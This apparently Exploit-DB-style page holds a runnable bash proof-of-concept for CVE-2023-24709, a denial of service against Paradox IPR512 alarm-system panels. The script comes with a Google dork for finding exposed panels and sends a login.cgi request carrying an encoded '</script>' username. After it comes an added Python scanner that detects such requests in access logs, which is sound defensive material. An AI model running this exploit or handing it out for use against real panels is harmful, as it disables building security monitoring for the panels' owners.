Paradox Security Systems IPR512 - Denial Of Service Exploit
```bash
#!/bin/bash
# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service
# Google Dork: intitle:"ipr512 * - login screen"
# Date: 09-APR-2023
# Exploit Author: Giorgi Dograshvili
# Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)
# Version: IPR512
# CVE : CVE-2023-24709

# Function to display banner message
display_banner() {
  echo "******************************************************"
  echo "* *"
  echo "* PoC CVE-2023-24709 *"
  echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *"
  echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *"
  echo "* by SlashXzerozero *"
  echo "* *"
  echo "******************************************************"
}

# Call the function to display the banner
display_banner
echo ""
echo ""
echo "Please enter a domain name or IP address with or without port"
read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain

# Step 2: Ask for user confirmation
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm
if [[ $confirm == "Y" || $confirm == "y" ]]; then
  # Display loading animation
  animation=("|" "/" "-" "\\")
  index=0
  while [[ $index -lt 10 ]]; do
    echo -ne "Loading ${animation[index]} \r"
    sleep 1
    index=$((index + 1))
  done

  # Use curl to send HTTP GET request with custom headers and timeout
  response=$(curl -i -s -k -X GET \
    -H "Host: $domain" \
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \
    -H "Accept: */" \
    -H "Referer: http://$domain/login.html" \
    -H "Accept-Encoding: gzip, deflate" \
    -H "Accept-Language: en-US,en;q=0.9" \
    -H "Connection: close" \
    --max-time 10 \
    "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")

  # Check response for HTTP status code 200 and print result
  if [[ $response == *"HTTP/1.1 200 OK"* ]]; then
    echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"
  else
    echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html"
  fi
else
  echo "The script is stopped!."
fi
```
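A defender-side check for the request the script above sends, as an added example that is not part of the original listing: it scans web access logs for `login.cgi` requests whose `log_user` value decodes to markup such as `</script>`. It assumes combined-format logs from a reverse proxy or gateway in front of the panel; the log lines, the function names and the rule "a username never contains `<` or `>`" are constructed for illustration, and the rule is broader than the single payload shown on the page.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [09/Apr/2023:10:00:01 +0000] "GET /login.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [09/Apr/2023:10:00:05 +0000] "GET /login.cgi?log_user=admin&log_passmd5=0cc175b9&r=17 HTTP/1.1" 200 80 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Apr/2023:10:02:11 +0000] "GET /login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.9 - - [09/Apr/2023:10:03:40 +0000] "GET /login.cgi?log_user=%253C%252Fscript%253E&log_passmd5=&r=1 HTTP/1.1" 200 0 "-" "curl/8.0"
"""

# Client address and request target from a combined-format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_suspicious_logins(lines):
    """Return (client, decoded log_user) for login.cgi requests carrying markup."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/login.cgi"):
            continue
        # parse_qs decodes once; fully_decode handles any further layers.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("log_user", []):
            user = fully_decode(raw)
            # Assumption: a legitimate username never contains angle brackets.
            if "<" in user or ">" in user:
                hits.append((client, user))
    return hits


if __name__ == "__main__":
    for client, user in find_suspicious_logins(SAMPLE_LOG.splitlines()):
        print(f"{client} sent log_user={user!r} to login.cgi")
```
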